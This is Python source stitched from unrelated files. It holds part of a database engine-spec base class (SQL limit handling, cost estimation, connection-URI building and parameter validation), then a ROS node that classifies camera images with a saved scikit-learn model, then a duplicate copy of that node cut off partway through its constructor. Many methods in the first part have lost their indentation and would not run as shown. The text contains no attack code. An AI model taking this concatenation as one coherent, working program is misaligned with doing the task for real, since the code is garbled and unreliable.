cls, sql: str, limit: int, database: "Database", force: bool = False
) -> str:
"""
Alters the SQL statement to apply a LIMIT clause
:param sql: SQL query
:param limit: Maximum number of rows to be returned by the query
:param database: Database instance
:return: SQL query with limit clause
"""
# TODO: Fix circular import caused by importing Database
if cls.limit_method == LimitMethod.WRAP_SQL:
sql = sql.strip("\t\n ;")
qry = (
select("*")
.select_from(TextAsFrom(text(sql), ["*"]).alias("inner_qry"))
.limit(limit)
)
return database.compile_sqla_query(qry)
if cls.limit_method == LimitMethod.FORCE_LIMIT:
parsed_query = sql_parse.ParsedQuery(sql)
sql = parsed_query.set_or_update_query_limit(limit, force=force)
return sql
@classmethod
def get_limit_from_sql(cls, sql: str) -> Optional[int]:
"""
Extract limit from SQL query
:param sql: SQL query
:return: Value of limit clause in query
"""
parsed_query = sql_parse.ParsedQuery(sql)
return parsed_query.limit
@classmethod
def set_or_update_query_limit(cls, sql: str, limit: int) -> str:
"""
Create a query based on original query but with new limit clause
:param sql: SQL query
:param limit: New limit to insert/replace into query
:return: Query with new limit
"""
parsed_query = sql_parse.ParsedQuery(sql)
return parsed_query.set_or_update_query_limit(limit)
@classmethod
def df_to_sql(
cls,
database: "Database",
table: Table,
df: pd.DataFrame,
to_sql_kwargs: Dict[str, Any],
) -> None:
"""
Upload data from a Pandas DataFrame to a database.
For regular engines this calls the `pandas.DataFrame.to_sql` method. Can be
overridden for engines that don't work well with this method, e.g. Hive and
BigQuery.
Note this method does not create metadata for the table.
:param database: The database to upload the data to
:param table: The table to upload the data to
:param df: The dataframe with data to be uploaded
:param to_sql_kwargs: The kwargs to be passed to pandas.DataFrame.to_sql` method
"""
engine = cls.get_engine(database)
to_sql_kwargs["name"] = table.table
if table.schema:
# Only add schema when it is preset and non empty.
to_sql_kwargs["schema"] = table.schema
if engine.dialect.supports_multivalues_insert:
to_sql_kwargs["method"] = "multi"
df.to_sql(con=engine, **to_sql_kwargs)
@classmethod
def convert_dttm( # pylint: disable=unused-argument
cls, target_type: str, dttm: datetime, db_extra: Optional[Dict[str, Any]] = None
) -> Optional[str]:
"""
Convert Python datetime object to a SQL expression
:param target_type: The target type of expression
:param dttm: The datetime object
:param db_extra: The database extra object
:return: The SQL expression
"""
return None
@classmethod
def get_all_datasource_names(
cls, database: "Database", datasource_type: str
) -> List[utils.DatasourceName]:
"""Returns a list of all tables or views in database.
:param database: Database instance
:param datasource_type: Datasource_type can be 'table' or 'view'
:return: List of all datasources in database or schema
"""
# TODO: Fix circular import caused by importing Database
schemas = database.get_all_schema_names(
cache=database.schema_cache_enabled,
cache_timeout=database.schema_cache_timeout,
force=True,
)
all_datasources: List[utils.DatasourceName] = []
for schema in schemas:
if datasource_type == "table":
all_datasources += database.get_all_table_names_in_schema(
schema=schema,
force=True,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
elif datasource_type == "view":
all_datasources += database.get_all_view_names_in_schema(
schema=schema,
force=True,
cache=database.table_cache_enabled,
cache_timeout=database.table_cache_timeout,
)
else:
raise Exception(f"Unsupported datasource_type: {datasource_type}")
return all_datasources
@classmethod
def handle_cursor(cls, cursor: Any, query: Query, session: Session) -> None:
"""Handle a live cursor between the execute and fetchall calls
The flow works without this method doing anything, but it allows
for handling the cursor and updating progress information in the
query object"""
# TODO: Fix circular import error caused by importing sql_lab.Query
@classmethod
def extract_error_message(cls, ex: Exception) -> str:
return f"{cls.engine} error: {cls._extract_error_message(ex)}"
@classmethod
def _extract_error_message(cls, ex: Exception) -> str:
"""Extract error message for queries"""
return utils.error_msg_from_exception(ex)
@classmethod
def extract_errors(
cls, ex: Exception, context: Optional[Dict[str, Any]] = None
) -> List[SupersetError]:
raw_message = cls._extract_error_message(ex)
context = context or {}
for regex, (message, error_type, extra) in cls.custom_errors.items():
match = regex.search(raw_message)
if match:
params = {**context, **match.groupdict()}
extra["engine_name"] = cls.engine_name
return [
SupersetError(
error_type=error_type,
message=message % params,
level=ErrorLevel.ERROR,
extra=extra,
)
]
return [
SupersetError(
error_type=SupersetErrorType.GENERIC_DB_ENGINE_ERROR,
message=cls._extract_error_message(ex),
level=ErrorLevel.ERROR,
extra={"engine_name": cls.engine_name},
)
]
@classmethod
def adjust_database_uri(cls, uri: URL, selected_schema: Optional[str]) -> None:
"""
Mutate the database component of the SQLAlchemy URI.
The URI here represents the URI as entered when saving the database,
``selected_schema`` is the schema currently active presumably in
the SQL Lab dropdown. Based on that, for some database engine,
we can return a new altered URI that connects straight to the
active schema, meaning the users won't have to prefix the object
names by the schema name.
Some databases engines have 2 level of namespacing: database and
schema (postgres, oracle, mssql, ...)
For those it's probably better to not alter the database
component of the URI with the schema name, it won't work.
Some database drivers like presto accept '{catalog}/{schema}' in
the database component of the URL, that can be handled here.
"""
@classmethod
def patch(cls) -> None:
"""
TODO: Improve docstring and refactor implementation in Hive
"""
@classmethod
def get_schema_names(cls, inspector: Inspector) -> List[str]:
"""
Get all schemas from database
:param inspector: SqlAlchemy inspector
:return: All schemas in the database
"""
return sorted(inspector.get_schema_names())
@classmethod
def get_table_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all tables from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema to inspect. If omitted, uses default schema for database
:return: All tables in schema
"""
tables = inspector.get_table_names(schema)
if schema and cls.try_remove_schema_from_table_name:
tables = [re.sub(f"^{schema}\\.", "", table) for table in tables]
return sorted(tables)
@classmethod
def get_view_names( # pylint: disable=unused-argument
cls, database: "Database", inspector: Inspector, schema: Optional[str],
) -> List[str]:
"""
Get all views from schema
:param database: The database to get info
:param inspector: SqlAlchemy inspector
:param schema: Schema name. If omitted, uses default schema for database
:return: All views in schema
"""
views = inspector.get_view_names(schema)
if schema and cls.try_remove_schema_from_table_name:
views = [re.sub(f"^{schema}\\.", "", view) for view in views]
return sorted(views)
@classmethod
def get_table_comment(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> Optional[str]:
"""
Get comment of table from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: comment of table
"""
comment = None
try:
comment = inspector.get_table_comment(table_name, schema)
comment = comment.get("text") if isinstance(comment, dict) else None
except NotImplementedError:
# It's expected that some dialects don't implement the comment method
pass
except Exception as ex: # pylint: disable=broad-except
logger.error("Unexpected error while fetching table comment", exc_info=True)
logger.exception(ex)
return comment
@classmethod
def get_columns(
cls, inspector: Inspector, table_name: str, schema: Optional[str]
) -> List[Dict[str, Any]]:
"""
Get all columns from a given schema and table
:param inspector: SqlAlchemy Inspector instance
:param table_name: Table name
:param schema: Schema name. If omitted, uses default schema for database
:return: All columns in table
"""
return inspector.get_columns(table_name, schema)
@classmethod
def where_latest_partition( # pylint: disable=too-many-arguments,unused-argument
cls,
table_name: str,
schema: Optional[str],
database: "Database",
query: Select,
columns: Optional[List[Dict[str, str]]] = None,
) -> Optional[Select]:
"""
Add a where clause to a query to reference only the most recent partition
:param table_name: Table name
:param schema: Schema name
:param database: Database instance
:param query: SqlAlchemy query
:param columns: List of TableColumns
:return: SqlAlchemy query with additional where clause referencing the latest
partition
"""
# TODO: Fix circular import caused by importing Database, TableColumn
return None
@classmethod
def _get_fields(cls, cols: List[Dict[str, Any]]) -> List[Any]:
return [column(c["name"]) for c in cols]
    @classmethod
    def select_star(  # pylint: disable=too-many-arguments,too-many-locals
        cls,
        database: "Database",
        table_name: str,
        engine: Engine,
        schema: Optional[str] = None,
        limit: int = 100,
        show_cols: bool = False,
        indent: bool = True,
        latest_partition: bool = True,
        cols: Optional[List[Dict[str, Any]]] = None,
    ) -> str:
        """
        Generate a "SELECT * from [schema.]table_name" query with appropriate limit.

        WARNING: expects only unquoted table and schema names.

        :param database: Database instance
        :param table_name: Table name, unquoted
        :param engine: SqlAlchemy Engine instance
        :param schema: Schema, unquoted
        :param limit: limit to impose on query
        :param show_cols: Show columns in query; otherwise use "*"
        :param indent: Add indentation to query
        :param latest_partition: Only query the latest partition
        :param cols: Columns to include in query
        :return: SQL query
        """
        # pylint: disable=redefined-outer-name
        fields: Union[str, List[Any]] = "*"
        cols = cols or []
        # Column metadata is needed both for explicit column lists and for
        # resolving the latest partition; fetch it only when not supplied.
        if (show_cols or latest_partition) and not cols:
            cols = database.get_columns(table_name, schema)
        if show_cols:
            fields = cls._get_fields(cols)
        # Quote identifiers with the dialect's own rules.
        quote = engine.dialect.identifier_preparer.quote
        if schema:
            full_table_name = quote(schema) + "." + quote(table_name)
        else:
            full_table_name = quote(table_name)
        qry = select(fields).select_from(text(full_table_name))
        if limit:
            qry = qry.limit(limit)
        if latest_partition:
            # Engines without partition support return None here (no-op).
            partition_query = cls.where_latest_partition(
                table_name, schema, database, qry, columns=cols
            )
            if partition_query is not None:
                qry = partition_query
        sql = database.compile_sqla_query(qry)
        if indent:
            sql = sqlparse.format(sql, reindent=True)
        return sql
@classmethod
def estimate_statement_cost(cls, statement: str, cursor: Any) -> Dict[str, Any]:
"""
Generate a SQL query that estimates the cost of a given statement.
:param statement: A single SQL statement
:param cursor: Cursor instance
:return: Dictionary with different costs
"""
raise Exception("Database does not support cost estimation")
@classmethod
def query_cost_formatter(
cls, raw_cost: List[Dict[str, Any]]
) -> List[Dict[str, str]]:
"""
Format cost estimate.
:param raw_cost: Raw estimate from `estimate_query_cost`
:return: Human readable cost estimate
"""
raise Exception("Database does not support cost estimation")
@classmethod
def process_statement(
cls, statement: str, database: "Database", user_name: str
) -> str:
"""
Process a SQL statement by stripping and mutating it.
:param statement: A single SQL statement
:param database: Database instance
:param user_name: Effective username
:return: Dictionary with different costs
"""
parsed_query = ParsedQuery(statement)
sql = parsed_query.stripped()
sql_query_mutator = current_app.config["SQL_QUERY_MUTATOR"]
if sql_query_mutator:
sql = sql_query_mutator(sql, user_name, security_manager, database)
return sql
    @classmethod
    def estimate_query_cost(
        cls,
        database: "Database",
        schema: str,
        sql: str,
        source: Optional[utils.QuerySource] = None,
    ) -> List[Dict[str, Any]]:
        """
        Estimate the cost of a multiple statement SQL query.

        :param database: Database instance
        :param schema: Database schema
        :param sql: SQL query with possibly multiple statements
        :param source: Source of the query (eg, "sql_lab")
        :return: One cost dict per statement, from estimate_statement_cost
        :raises Exception: when the engine does not support cost estimation
        """
        extra = database.get_extra() or {}
        if not cls.get_allow_cost_estimate(extra):
            raise Exception("Database does not support cost estimation")
        # Effective user from the Flask request context, if any.
        user_name = g.user.username if g.user and hasattr(g.user, "username") else None
        parsed_query = sql_parse.ParsedQuery(sql)
        statements = parsed_query.get_statements()
        engine = cls.get_engine(database, schema=schema, source=source)
        costs = []
        # `closing` guarantees the raw connection is released even on error.
        with closing(engine.raw_connection()) as conn:
            cursor = conn.cursor()
            for statement in statements:
                processed_statement = cls.process_statement(
                    statement, database, user_name
                )
                costs.append(cls.estimate_statement_cost(processed_statement, cursor))
        return costs
@classmethod
def modify_url_for_impersonation(
    cls, url: URL, impersonate_user: bool, username: Optional[str]
) -> None:
    """Rewrite the SQLAlchemy URL in place to impersonate ``username``.

    Does nothing unless impersonation is enabled and a username is given.

    :param url: SQLAlchemy URL object
    :param impersonate_user: Flag indicating if impersonation is enabled
    :param username: Effective username
    """
    if not impersonate_user or username is None:
        return
    url.username = username
@classmethod
def update_impersonation_config(
    cls, connect_args: Dict[str, Any], uri: str, username: Optional[str],
) -> None:
    """
    Update a configuration dictionary
    that can set the correct properties for impersonating users.

    The base implementation is a deliberate no-op; engine specs that pass
    the impersonated user via connection arguments override this hook.

    :param connect_args: config to be updated
    :param uri: URI
    :param username: Effective username
    :return: None
    """
@classmethod
def execute(  # pylint: disable=unused-argument
    cls, cursor: Any, query: str, **kwargs: Any,
) -> None:
    """
    Execute a SQL query.

    :param cursor: Cursor instance
    :param query: Query to execute
    :param kwargs: accepted so engine-spec subclasses can forward extra
        arguments to ``cursor.execute()``; ignored by this base
        implementation
    :raises Exception: the DB API error translated via
        ``get_dbapi_mapped_exception``
    """
    if not cls.allows_sql_comments:
        query = sql_parse.strip_comments_from_sql(query)
    if cls.arraysize:
        cursor.arraysize = cls.arraysize
    try:
        cursor.execute(query)
    except Exception as ex:
        # Chain explicitly so the original DB API error is kept as
        # __cause__ in tracebacks.
        raise cls.get_dbapi_mapped_exception(ex) from ex
@classmethod
def make_label_compatible(cls, label: str) -> Union[str, quoted_name]:
    """Adapt an expression label/alias to what the engine supports.

    The label is first passed through ``_mutate_label``; if the result
    exceeds the engine's max column-name length, a deterministic truncated
    label is derived from the *original* label instead. When
    ``force_column_alias_quotes`` is set, the result is wrapped in a
    ``quoted_name`` so the query and its result set keep the same case.

    :param label: expected expression label/alias
    :return: conditionally mutated label supported by the db engine
    """
    mutated = cls._mutate_label(label)
    limit = cls.max_column_name_length
    if limit and len(mutated) > limit:
        mutated = cls._truncate_label(label)
    if cls.force_column_alias_quotes:
        return quoted_name(mutated, True)
    return mutated
@classmethod
def get_sqla_column_type(
    cls,
    column_type: Optional[str],
    column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[Tuple[TypeEngine, GenericDataType]]:
    """Map a database-reported column type string to a SQLAlchemy type.

    Returns None for unknown types, letting SQLAlchemy infer a default.
    Override ``column_type_mappings`` for engine-specific needs
    (see MSSQL for example of NCHAR/NVARCHAR handling).

    :param column_type: Column type returned by inspector
    :param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
    :return: SqlAlchemy column type, or None if no mapping matched
    """
    if not column_type:
        return None
    for regex, sqla_type, generic_type in column_type_mappings:
        match = regex.match(column_type)
        if match:
            # A mapping entry may be a factory taking the regex match.
            resolved = sqla_type(match) if callable(sqla_type) else sqla_type
            return resolved, generic_type
    return None
@staticmethod
def _mutate_label(label: str) -> str:
"""
Most engines support mixed case aliases that can include numbers
and special characters, like commas, parentheses etc. For engines that
have restrictions on what types of aliases are supported, this method
can be overridden to ensure that labels conform to the engine's
limitations. Mutated labels should be deterministic (input label A always
yields output label X) and unique (input labels A and B don't yield the same
output label X).
:param label: Preferred expression label
:return: Conditionally mutated label
"""
return label
@classmethod
def _truncate_label(cls, label: str) -> str:
    """Replace an over-long label with a deterministic md5-based surrogate.

    Used when a label exceeds the engine's maximum column-name length; the
    hash itself is truncated too if it still exceeds that limit.

    :param label: Expected expression label
    :return: Truncated label
    """
    hashed = md5_sha_from_str(label)
    limit = cls.max_column_name_length
    # Truncate the hash if even it exceeds the engine's max length.
    return hashed[:limit] if limit and len(hashed) > limit else hashed
@classmethod
def column_datatype_to_string(
    cls, sqla_column_type: TypeEngine, dialect: Dialect
) -> str:
    """Compile a SQLAlchemy column type to an upper-cased string.

    Collation and character-set attributes are cleared on a copy of the
    type first, to avoid unnecessarily long rendered datatypes.

    :param sqla_column_type: SqlAlchemy column type
    :param dialect: Sqlalchemy dialect
    :return: Compiled column type
    """
    stripped = sqla_column_type.copy()
    for attr in ("collation", "charset"):
        if hasattr(stripped, attr):
            setattr(stripped, attr, None)
    return stripped.compile(dialect=dialect).upper()
@classmethod
def get_function_names(  # pylint: disable=unused-argument
    cls, database: "Database",
) -> List[str]:
    """Return function names usable for SQL Lab autocomplete.

    The base engine spec advertises none; engines override this.

    :param database: The database to get functions for
    :return: A list of function names useable in the database
    """
    return []
@staticmethod
def pyodbc_rows_to_tuples(data: List[Any]) -> List[Tuple[Any, ...]]:
    """Normalize pyodbc.Row objects from ``fetch_data`` into plain tuples.

    Detection is by type name so that pyodbc itself never needs to be
    importable; any other payload is returned untouched.

    :param data: List of tuples or pyodbc.Row objects
    :return: List of tuples
    """
    if not data or type(data[0]).__name__ != "Row":
        return data
    return [tuple(row) for row in data]
@staticmethod
def mutate_db_for_connection_test(  # pylint: disable=unused-argument
    database: "Database",
) -> None:
    """Hook to tweak a database instance before a test-connection attempt.

    Engines that need extra parameters to validate connections override
    this; the base implementation leaves the instance untouched.

    :param database: instance to be mutated
    """
    return None
@staticmethod
def get_extra_params(database: "Database") -> Dict[str, Any]:
    """
    Some databases require adding elements to connection parameters,
    like passing certificates to `extra`. This can be done here.

    :param database: database instance from which to extract extras
    :return: parsed ``extra`` JSON payload, or an empty dict
    :raises json.JSONDecodeError: if ``database.extra`` is not valid JSON
    """
    extra: Dict[str, Any] = {}
    if database.extra:
        try:
            extra = json.loads(database.extra)
        except json.JSONDecodeError as ex:
            logger.error(ex, exc_info=True)
            # Bare raise keeps the original traceback intact.
            raise
    return extra
@staticmethod
def update_encrypted_extra_params(
    database: "Database", params: Dict[str, Any]
) -> None:
    """
    Some databases require some sensitive information which do not conform to
    the username:password syntax normally used by SQLAlchemy.

    Merges the parsed ``encrypted_extra`` JSON payload into ``params``
    (mutated in place).

    :param database: database instance from which to extract extras
    :param params: params to be updated
    :raises json.JSONDecodeError: if ``encrypted_extra`` is not valid JSON
    """
    if not database.encrypted_extra:
        return
    try:
        # Keep the try narrow: only the JSON parse can raise JSONDecodeError.
        encrypted_extra = json.loads(database.encrypted_extra)
    except json.JSONDecodeError as ex:
        logger.error(ex, exc_info=True)
        # Bare raise keeps the original traceback intact.
        raise
    params.update(encrypted_extra)
@classmethod
def is_readonly_query(cls, parsed_query: ParsedQuery) -> bool:
    """Pessimistic readonly, 100% sure statement won't mutate anything"""
    if parsed_query.is_select():
        return True
    if parsed_query.is_explain():
        return True
    return parsed_query.is_show()
@classmethod
def is_select_query(cls, parsed_query: ParsedQuery) -> bool:
    """Report whether the statement should be treated as a SELECT.

    Some query dialects do not contain "SELECT" word in queries (eg. Kusto),
    so engine specs may override this check.
    """
    return parsed_query.is_select()
@classmethod
def get_column_spec(  # pylint: disable=unused-argument
    cls,
    native_type: Optional[str],
    db_extra: Optional[Dict[str, Any]] = None,
    source: utils.ColumnTypeSource = utils.ColumnTypeSource.GET_TABLE,
    column_type_mappings: Tuple[ColumnTypeMapping, ...] = column_type_mappings,
) -> Optional[ColumnSpec]:
    """Convert a native database type to a ``ColumnSpec``.

    :param native_type: Native database type
    :param db_extra: The database extra object
    :param source: Type coming from the database table or cursor description
    :param column_type_mappings: Maps from string to SqlAlchemy TypeEngine
    :return: ColumnSpec object, or None for unknown native types
    """
    col_types = cls.get_sqla_column_type(
        native_type, column_type_mappings=column_type_mappings
    )
    if not col_types:
        return None

    column_type, generic_type = col_types
    is_dttm = generic_type == GenericDataType.TEMPORAL
    if is_dttm:
        # Wrap temporal types in a custom type that supports literal
        # binding using datetimes.
        column_type = literal_dttm_type_factory(
            column_type, cls, native_type or "", db_extra=db_extra or {}
        )
    return ColumnSpec(
        sqla_type=column_type, generic_type=generic_type, is_dttm=is_dttm
    )
@classmethod
def has_implicit_cancel(cls) -> bool:
    """Report whether the live cursor cancels the query implicitly.

    :return: Whether the live cursor implicitly cancels the query
    :see: handle_cursor
    """
    return False
@classmethod
def get_cancel_query_id(  # pylint: disable=unused-argument
    cls, cursor: Any, query: Query,
) -> Optional[str]:
    """Fetch an engine-specific identifier used to cancel the query later.

    Typically a session id, process id or similar; the base spec supports
    none, so it returns None.

    :param cursor: Cursor instance in which the query will be executed
    :param query: Query instance
    :return: Query identifier, or None when cancellation is unsupported
    """
    return None
@classmethod
def cancel_query(  # pylint: disable=unused-argument
    cls, cursor: Any, query: Query, cancel_query_id: str,
) -> bool:
    """Cancel the query in the underlying database; the base spec cannot.

    :param cursor: New cursor instance to the db of the query
    :param query: Query instance
    :param cancel_query_id: Value returned by get_cancel_query_payload or set in
        other life-cycle methods of the query
    :return: True if query cancelled successfully, False otherwise
    """
    return False
@classmethod
def parse_sql(cls, sql: str) -> List[str]:
    """Split ``sql`` into statements, trimmed of blanks and semicolons."""
    statements = sqlparse.parse(sql)
    return [str(statement).strip(" ;") for statement in statements]
# schema for adding a database by providing parameters instead of the
# full SQLAlchemy URI
class BasicParametersSchema(Schema):
    """Marshmallow schema for the individual connection parameters used to
    build a SQLAlchemy URI (see ``BasicParametersMixin``)."""

    username = fields.String(required=True, allow_none=True, description=__("Username"))
    password = fields.String(allow_none=True, description=__("Password"))
    host = fields.String(required=True, description=__("Hostname or IP address"))
    port = fields.Integer(
        required=True,
        description=__("Database port"),
        # Valid TCP port range: 0 <= port < 65536.
        validate=Range(min=0, max=2 ** 16, max_inclusive=False),
    )
    database = fields.String(required=True, description=__("Database name"))
    query = fields.Dict(
        keys=fields.Str(), values=fields.Raw(), description=__("Additional parameters")
    )
    encryption = fields.Boolean(
        required=False, description=__("Use an encrypted connection to the database")
    )
class BasicParametersType(TypedDict, total=False):
    """Typed shape of the parameters validated by ``BasicParametersSchema``;
    every key is optional (``total=False``)."""

    username: Optional[str]
    password: Optional[str]
    host: str
    port: int
    database: str
    query: Dict[str, Any]
    encryption: bool
class BasicParametersMixin:
    """
    Mixin for configuring DB engine specs via a dictionary.

    With this mixin the SQLAlchemy engine can be configured through
    individual parameters, instead of the full SQLAlchemy URI. This
    mixin is for the most common pattern of URI:

        engine+driver://user:password@host:port/dbname[?key=value&key=value...]
    """

    # schema describing the parameters used to configure the DB
    parameters_schema = BasicParametersSchema()

    # recommended driver name for the DB engine spec
    default_driver = ""

    # placeholder with the SQLAlchemy URI template
    sqlalchemy_uri_placeholder = (
        "engine+driver://user:password@host:port/dbname[?key=value&key=value...]"
    )

    # query parameter to enable encryption in the database connection
    # for Postgres this would be `{"sslmode": "verify-ca"}`, eg.
    encryption_parameters: Dict[str, str] = {}

    @classmethod
    def build_sqlalchemy_uri(  # pylint: disable=unused-argument
        cls,
        parameters: BasicParametersType,
        # NOTE(review): parameter name is misspelled ("encryted"); kept as-is
        # because renaming would break keyword callers.
        encryted_extra: Optional[Dict[str, str]] = None,
    ) -> str:
        """Assemble a SQLAlchemy URI string from individual parameters.

        :param parameters: individual connection parameters
        :param encryted_extra: unused here; accepted for interface parity
        :return: the rendered SQLAlchemy URI
        :raises Exception: if encryption is requested but this engine spec
            defines no ``encryption_parameters``
        """
        # make a copy so that we don't update the original
        query = parameters.get("query", {}).copy()
        if parameters.get("encryption"):
            if not cls.encryption_parameters:
                raise Exception("Unable to build a URL with encryption enabled")
            query.update(cls.encryption_parameters)

        return str(
            URL(
                # rstrip("+") handles an empty default_driver cleanly.
                f"{cls.engine}+{cls.default_driver}".rstrip("+"),  # type: ignore
                username=parameters.get("username"),
                password=parameters.get("password"),
                host=parameters["host"],
                port=parameters["port"],
                database=parameters["database"],
                query=query,
            )
        )

    @classmethod
    def get_parameters_from_uri(  # pylint: disable=unused-argument
        cls, uri: str, encrypted_extra: Optional[Dict[str, Any]] = None
    ) -> BasicParametersType:
        """Decompose a SQLAlchemy URI back into individual parameters.

        Encryption-related query parameters are stripped from ``query`` and
        reported via the boolean ``encryption`` flag instead.
        """
        url = make_url(uri)
        query = {
            key: value
            for (key, value) in url.query.items()
            if (key, value) not in cls.encryption_parameters.items()
        }
        # Encryption counts as enabled only if every encryption parameter
        # is present in the URI.
        encryption = all(
            item in url.query.items() for item in cls.encryption_parameters.items()
        )
        return {
            "username": url.username,
            "password": url.password,
            "host": url.host,
            "port": url.port,
            "database": url.database,
            "query": query,
            "encryption": encryption,
        }

    @classmethod
    def validate_parameters(
        cls, parameters: BasicParametersType
    ) -> List[SupersetError]:
        """
        Validates any number of parameters, for progressive validation.

        If only the hostname is present it will check if the name is resolvable. As more
        parameters are present in the request, more validation is done.
        """
        errors: List[SupersetError] = []

        required = {"host", "port", "username", "database"}
        # NOTE(review): falsy values (0, "") are treated as missing here
        # because of the truthiness test — confirm this is intended.
        present = {key for key in parameters if parameters.get(key, ())}
        missing = sorted(required - present)

        if missing:
            errors.append(
                SupersetError(
                    message=f'One or more parameters are missing: {", ".join(missing)}',
                    error_type=SupersetErrorType.CONNECTION_MISSING_PARAMETERS_ERROR,
                    level=ErrorLevel.WARNING,
                    extra={"missing": missing},
                ),
            )

        host = parameters.get("host", None)
        if not host:
            return errors
        if not is_hostname_valid(host):
            errors.append(
                SupersetError(
                    message="The hostname provided can't be resolved.",
                    error_type=SupersetErrorType.CONNECTION_INVALID_HOSTNAME_ERROR,
                    level=ErrorLevel.ERROR,
                    extra={"invalid": ["host"]},
                ),
            )
            return errors

        port = parameters.get("port", None)
        if not port:
            return errors
        try:
            port = int(port)
        except (ValueError, TypeError):
            # NOTE(review): a non-numeric port falls through to the range
            # check below and is reported twice — confirm intended.
            errors.append(
                SupersetError(
                    message="Port must be a valid integer.",
                    error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
                    level=ErrorLevel.ERROR,
                    extra={"invalid": ["port"]},
                ),
            )
        if not (isinstance(port, int) and 0 <= port < 2 ** 16):
            errors.append(
                SupersetError(
                    message=(
                        "The port must be an integer between 0 and 65535 "
                        "(inclusive)."
                    ),
                    error_type=SupersetErrorType.CONNECTION_INVALID_PORT_ERROR,
                    level=ErrorLevel.ERROR,
                    extra={"invalid": ["port"]},
                ),
            )
        elif not is_port_open(host, port):
            errors.append(
                SupersetError(
                    message="The port is closed.",
                    error_type=SupersetErrorType.CONNECTION_PORT_CLOSED_ERROR,
                    level=ErrorLevel.ERROR,
                    extra={"invalid": ["port"]},
                ),
            )

        return errors

    @classmethod
    def parameters_json_schema(cls) -> Any:
        """
        Return configuration parameters as OpenAPI.
        """
        if not cls.parameters_schema:
            return None

        spec = APISpec(
            title="Database Parameters",
            version="1.0.0",
            openapi_version="3.0.2",
            plugins=[MarshmallowPlugin()],
        )
        spec.components.schema(cls.__name__, schema=cls.parameters_schema)
        return spec.to_dict()["components"]["schemas"][cls.__name__]
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import cv2
import rospy
import rospkg
import numpy as np
from joblib import load
from sklearn import svm
from std_msgs.msg import Empty, String
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge
from ecs.srv import Descriptor
class ImageBasedEnvironmentClassification:
    """ROS node that classifies the environment from camera images.

    Subscribes to a compressed-image camera topic; each trigger message
    requests a descriptor for the latest image from an external service,
    runs the loaded classifier on it, and publishes the mapped class name.
    """

    def __init__(self):
        # load parameters
        self.settings = None
        self.load_settings()
        rospack = rospkg.RosPack()
        self.classifier_path = os.path.join(rospack.get_path(
            self.settings["classifier_pkg"]), self.settings["classifier_file"])
        self.image_subscriber = rospy.Subscriber(
            self.settings["camera_topic"], CompressedImage, callback=self.image_subscriber_callback, queue_size=1)
        self.trigger_subscriber = rospy.Subscriber(
            self.settings["trigger_topic"], Empty, callback=self.trigger_callback, queue_size=1)
        self.decision_publisher = rospy.Publisher(
            self.settings["decision_topic"], String, queue_size=10)
        self.print_info(f"Loaded classifier: {self.classifier_path}")
        # BUGFIX: use single quotes inside the f-string expressions — reusing
        # double quotes here is a SyntaxError before Python 3.12.
        self.print_info(f"Camera topic: {self.settings['camera_topic']}")
        self.print_info(f"Trigger topic: {self.settings['trigger_topic']}")
        self.print_info(f"Decision topic: {self.settings['decision_topic']}")
        self.img = None
        self.cv_bridge = CvBridge()
        self.classifier = load(self.classifier_path)

    def print_info(self, msg):
        """Log ``msg`` prefixed with this node's name."""
        rospy.loginfo(f"[{rospy.get_name()}]: {msg}")

    def load_settings(self):
        """Fetch node settings from the ROS parameter server."""
        self.settings = rospy.get_param("ecs_ibec")

    def image_subscriber_callback(self, msg):
        """Decode the latest compressed image into a BGR OpenCV matrix."""
        data_arr = np.frombuffer(msg.data, np.uint8)
        self.img = cv2.imdecode(data_arr, cv2.IMREAD_COLOR)

    def descriptor_service_client(self):
        """Request a descriptor vector for the current image.

        Returns the service response data, or None when no image has been
        received yet or the service call fails.
        """
        rospy.wait_for_service(self.settings["descriptor_service"])
        if self.img is None:
            return None
        try:
            descriptor_service = rospy.ServiceProxy(
                self.settings["descriptor_service"], Descriptor)
            resp1 = descriptor_service(
                self.cv_bridge.cv2_to_imgmsg(self.img, encoding="bgr8"))
            return resp1.data
        except rospy.ServiceException as e:
            print("Service call failed: %s" % e)

    def trigger_callback(self, msg):
        """Run one classification cycle on each trigger message."""
        self.process()

    def process(self):
        """Classify the current image and publish the mapped class name."""
        descriptor = self.descriptor_service_client()
        # BUGFIX: check for None BEFORE np.asarray — np.asarray(None) yields
        # a 0-d object array, so the old `is None` guard could never fire.
        if descriptor is None:
            return
        desc_vector = np.asarray(descriptor)
        prediction = self.classifier.predict(desc_vector.reshape(1, -1))[0]
        self.print_info(f"prediction: {prediction}")
        prediction_text = self.settings.get("class_mapping").get(str(prediction))
        if prediction_text is None:
            self.print_info(f"Unknown class prediction [class mapping is missing]")
            return
        self.decision_publisher.publish(prediction_text)
if __name__ == "__main__":
    # Start the classification node and block until ROS shuts down.
    rospy.init_node("ecs_classification_classic_node")
    ibec = ImageBasedEnvironmentClassification()
    rospy.spin()
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import cv2
import rospy
import rospkg
import numpy as np
from joblib import load
from sklearn import svm
from std_msgs.msg import Empty, String
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge
from ecs.srv import Descriptor
class ImageBasedEnvironmentClassification:
    """ROS node publishing an environment class predicted from camera images."""

    def __init__(self):
        # Parameters come from the ROS parameter server.
        self.settings = None
        self.load_settings()

        pkg_root = rospkg.RosPack().get_path(self.settings["classifier_pkg"])
        self.classifier_path = os.path.join(
            pkg_root, self.settings["classifier_file"])

        self.image_subscriber = rospy.Subscriber(
            self.settings["camera_topic"], CompressedImage,
            callback=self.image_subscriber_callback, queue_size=1)
        self.trigger_subscriber = rospy.Subscriber(
            self.settings["trigger_topic"], Empty,
            callback=self.trigger_callback, queue_size=1)
        self.decision_publisher = rospy.Publisher(
            self.settings["decision_topic"], String, queue_size=10)

        self.print_info(f"Loaded classifier: {self.classifier_path}")
        self.print_info(f"Camera topic: {self.settings['camera_topic']}")
